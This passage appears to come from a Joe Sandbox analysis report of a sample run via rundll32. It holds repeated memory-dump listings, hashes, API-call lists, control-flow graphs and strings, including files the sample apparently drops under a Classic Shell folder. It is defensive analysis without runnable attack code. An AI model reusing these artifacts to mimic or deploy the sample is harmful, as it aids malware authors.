                          • Associated: 0000000A.00000002.2902947333.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903002028.000000000086E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903045311.0000000000871000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903090260.0000000000873000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903138946.000000000087D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903182602.000000000087F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903230999.0000000000888000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903230999.000000000088C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903308167.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903345669.0000000000892000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903387901.0000000000894000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903431484.0000000000895000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903478244.0000000000897000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903528971.000000000089A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903582303.000000000089B000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903582303.000000000089D000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_10_2_400000_rundll32.jbxd
                          Similarity
                          • API ID: Open$QueryValue$CloseFileModuleName
                          • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales$Software\CodeGear\Locales$Software\Embarcadero\Locales
                          • API String ID: 2701450724-3496071916
                          • Opcode ID: 2633d8292f0b00caf57c00c70ce3728d2763ece68da1b17402b5b319c40034b5
                          • Instruction ID: 05af0d7f2029f71a10c68c1639b48ed8a0d1e1dacfaf04c10325f7dc7332685a
                          • Opcode Fuzzy Hash: 2633d8292f0b00caf57c00c70ce3728d2763ece68da1b17402b5b319c40034b5
                          • Instruction Fuzzy Hash: 65610A71204BC589DB30DF71E8983DA23A5F78838CF51112A9B4D5BB5AEF78C695C348
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          APIs
                          • GetUserDefaultUILanguage.KERNEL32 ref: 0041525E
                          • GetLocaleInfoW.KERNEL32 ref: 00415277
                            • Part of subcall function 00415080: FindFirstFileW.KERNEL32 ref: 004150B2
                            • Part of subcall function 00415080: FindClose.KERNEL32 ref: 004150CD
                          Memory Dump Source
                          • Source File: 0000000A.00000002.2901184491.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000000A.00000002.2901127754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2901184491.0000000000428000.00000020.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2901840390.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2901891803.0000000000826000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2901934450.0000000000827000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902025510.000000000082D000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902076409.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902152302.0000000000830000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902204134.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902236982.000000000083D000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902272171.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902309427.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902347529.0000000000842000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902400420.0000000000843000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902439834.000000000084A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902479600.000000000084B000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902520212.000000000084D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902558446.000000000084F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902602427.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902644215.0000000000852000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902686895.0000000000855000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902728719.0000000000856000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902772728.0000000000858000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902814023.0000000000859000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902855228.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902902519.0000000000863000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902947333.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903002028.000000000086E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903045311.0000000000871000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903090260.0000000000873000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903138946.000000000087D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903182602.000000000087F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903230999.0000000000888000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903230999.000000000088C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903308167.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903345669.0000000000892000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903387901.0000000000894000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903431484.0000000000895000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903478244.0000000000897000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903528971.000000000089A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903582303.000000000089B000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903582303.000000000089D000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_10_2_400000_rundll32.jbxd
                          Similarity
                          • API ID: Find$CloseDefaultFileFirstInfoLanguageLocaleUser
                          • String ID:
                          • API String ID: 3216391948-0
                          • Opcode ID: 3b490b7cf56bbf91dd2b89981af10d7b9414ed50fc2553a7ed94af2cd6a02d18
                          • Instruction ID: a21e750fdb81c3cb80ceca5676c95766672ab79d1740a75253142ae5867d54cb
                          • Opcode Fuzzy Hash: 3b490b7cf56bbf91dd2b89981af10d7b9414ed50fc2553a7ed94af2cd6a02d18
                          • Instruction Fuzzy Hash: A321E476210A4089DB20EF76C8917D927A0EB88BDCF50212BFB4E57B69DF38C485C784
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 164 415080-4150c8 call 40ff70 call 411140 FindFirstFileW 169 4150d2-4150ec call 40fde0 164->169 170 4150ca-4150cd FindClose 164->170 170->169
                          APIs
                          Memory Dump Source
                          • Source File: 0000000A.00000002.2901184491.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000000A.00000002.2901127754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2901184491.0000000000428000.00000020.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2901840390.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2901891803.0000000000826000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2901934450.0000000000827000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902025510.000000000082D000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902076409.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902152302.0000000000830000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902204134.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902236982.000000000083D000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902272171.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902309427.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902347529.0000000000842000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902400420.0000000000843000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902439834.000000000084A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902479600.000000000084B000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902520212.000000000084D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902558446.000000000084F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902602427.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902644215.0000000000852000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902686895.0000000000855000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902728719.0000000000856000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902772728.0000000000858000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902814023.0000000000859000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902855228.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902902519.0000000000863000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902947333.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903002028.000000000086E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903045311.0000000000871000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903090260.0000000000873000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903138946.000000000087D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903182602.000000000087F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903230999.0000000000888000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903230999.000000000088C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903308167.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903345669.0000000000892000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903387901.0000000000894000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903431484.0000000000895000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903478244.0000000000897000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903528971.000000000089A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903582303.000000000089B000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903582303.000000000089D000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_10_2_400000_rundll32.jbxd
                          Similarity
                          • API ID: Find$CloseFileFirst
                          • String ID:
                          • API String ID: 2295610775-0
                          • Opcode ID: 9164da4fdb7a13e248c7ae70de005f26abc0b9fef4fc521832ab366a37fbd560
                          • Instruction ID: 042890e011036333e5bfd1d3754174ebbb35ecdb7fac3d7a8451519e581d693b
                          • Opcode Fuzzy Hash: 9164da4fdb7a13e248c7ae70de005f26abc0b9fef4fc521832ab366a37fbd560
                          • Instruction Fuzzy Hash: E6F054622019C089CB71AF31C8952ED3710DB467ACF081336A66D4BBE5DE28C595C704
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          APIs
                          • GetMessageW.USER32 ref: 00816038
                            • Part of subcall function 00436960: GetFileAttributesW.KERNEL32 ref: 00436979
                          • Sleep.KERNEL32 ref: 00815FC0
                          Strings
                          • C:\Program Files\Classic Shell\cache, xrefs: 00815FC5, 00815FD7
                          • C:\Program Files\Classic Shell, xrefs: 00815F9C, 00815FAE
                          • 78E2EA2D09306A8E4A8449A17700DF32552EBEFB77AC3717BD2C51BE359B53EC181830EB04550D33587B2E0329D21F279182D7E2FDCD044A89361634CAF375101F, xrefs: 00815FF1
                          • C:\Program Files\Classic Shell\whq.zip, xrefs: 00816004
                          • \VMware Workstation.lnk, xrefs: 00815F58
                          Memory Dump Source
                          • Source File: 0000000A.00000002.2901184491.0000000000428000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000000A.00000002.2901127754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2901184491.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2901840390.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2901891803.0000000000826000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2901934450.0000000000827000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902025510.000000000082D000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902076409.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902152302.0000000000830000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902204134.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902236982.000000000083D000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902272171.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902309427.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902347529.0000000000842000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902400420.0000000000843000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902439834.000000000084A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902479600.000000000084B000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902520212.000000000084D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902558446.000000000084F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902602427.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902644215.0000000000852000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902686895.0000000000855000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902728719.0000000000856000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902772728.0000000000858000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902814023.0000000000859000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902855228.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902902519.0000000000863000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902947333.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903002028.000000000086E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903045311.0000000000871000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903090260.0000000000873000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903138946.000000000087D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903182602.000000000087F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903230999.0000000000888000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903230999.000000000088C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903308167.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903345669.0000000000892000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903387901.0000000000894000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903431484.0000000000895000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903478244.0000000000897000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903528971.000000000089A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903582303.000000000089B000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903582303.000000000089D000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_10_2_400000_rundll32.jbxd
                          Similarity
                          • API ID: AttributesFileMessageSleep
                          • String ID: 78E2EA2D09306A8E4A8449A17700DF32552EBEFB77AC3717BD2C51BE359B53EC181830EB04550D33587B2E0329D21F279182D7E2FDCD044A89361634CAF375101F$C:\Program Files\Classic Shell$C:\Program Files\Classic Shell\cache$C:\Program Files\Classic Shell\whq.zip$\VMware Workstation.lnk
                          • API String ID: 2390311571-3073936675
                          • Opcode ID: 129142bfb51975e8b592fb8c9b1c301ee2532256d8dbf39388386f8aeb2b2ad8
                          • Instruction ID: 9cd3db94755c139ddff007fdf6a470e84e12c6dbf9b29939154e8315843d076e
                          • Opcode Fuzzy Hash: 129142bfb51975e8b592fb8c9b1c301ee2532256d8dbf39388386f8aeb2b2ad8
                          • Instruction Fuzzy Hash: 79317331200E05D4EB10EF72D8A13D92725FF9479CF805116FA8E976A5EF79C589C394
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          APIs
                          • LeaveCriticalSection.KERNEL32 ref: 00414771
                          • EnterCriticalSection.KERNEL32 ref: 00414847
                          • LeaveCriticalSection.KERNEL32 ref: 00414880
                          Memory Dump Source
                          • Source File: 0000000A.00000002.2901184491.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000000A.00000002.2901127754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2901184491.0000000000428000.00000020.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2901840390.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2901891803.0000000000826000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2901934450.0000000000827000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902025510.000000000082D000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902076409.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902152302.0000000000830000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902204134.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902236982.000000000083D000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902272171.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902309427.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902347529.0000000000842000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902400420.0000000000843000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902439834.000000000084A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902479600.000000000084B000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902520212.000000000084D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902558446.000000000084F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902602427.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902644215.0000000000852000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902686895.0000000000855000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902728719.0000000000856000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902772728.0000000000858000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902814023.0000000000859000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902855228.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902902519.0000000000863000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902947333.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903002028.000000000086E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903045311.0000000000871000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903090260.0000000000873000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903138946.000000000087D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903182602.000000000087F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903230999.0000000000888000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903230999.000000000088C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903308167.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903345669.0000000000892000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903387901.0000000000894000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903431484.0000000000895000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903478244.0000000000897000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903528971.000000000089A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903582303.000000000089B000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903582303.000000000089D000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_10_2_400000_rundll32.jbxd
                          Similarity
                          • API ID: CriticalSection$Leave$Enter
                          • String ID:
                          • API String ID: 2978645861-0
                          • Opcode ID: 81552ea04b8f0d4334cc7bdf6af72e2620360f65341830c32bae4a6db5f01a9f
                          • Instruction ID: 56c173e72efaabb3100106b86f381f207646cefe1b26b91f93a20514a2ca776e
                          • Opcode Fuzzy Hash: 81552ea04b8f0d4334cc7bdf6af72e2620360f65341830c32bae4a6db5f01a9f
                          • Instruction Fuzzy Hash: 39411D65210A5088DB10EF72D4913E92722EB84B9CF85A127FB4E87AA9DF7CC5C5C358
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 113 436960-436983 call 411140 GetFileAttributesW 116 436989-436991 113->116 117 436a4e-436a56 GetLastError 113->117 120 436993-43699d 116->120 121 4369a2-4369a4 116->121 118 436a79-436a7c 117->118 119 436a58-436a5b 117->119 122 436a81-436a8d 118->122 119->118 123 436a5d-436a63 119->123 120->122 124 4369a6-4369db CreateFileW 121->124 125 4369f8-4369fe 121->125 123->118 128 436a65-436a68 123->128 124->122 129 4369e1-4369f3 CloseHandle 124->129 126 436a00-436a03 125->126 127 436a05-436a3a call 420600 125->127 126->122 134 436a49-436a4c 127->134 135 436a3c-436a47 call 420550 127->135 128->118 131 436a6a-436a6d 128->131 129->122 131->118 133 436a6f-436a72 131->133 133->118 136 436a74-436a77 133->136 134->122 135->122 136->118 137 436a7e 136->137 137->122
                          APIs
                          Memory Dump Source
                          • Source File: 0000000A.00000002.2901184491.0000000000428000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000000A.00000002.2901127754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2901184491.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2901840390.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2901891803.0000000000826000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2901934450.0000000000827000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902025510.000000000082D000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902076409.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902152302.0000000000830000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902204134.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902236982.000000000083D000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902272171.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902309427.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902347529.0000000000842000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902400420.0000000000843000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902439834.000000000084A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902479600.000000000084B000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902520212.000000000084D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902558446.000000000084F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902602427.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902644215.0000000000852000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902686895.0000000000855000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902728719.0000000000856000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902772728.0000000000858000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902814023.0000000000859000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902855228.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902902519.0000000000863000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902947333.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
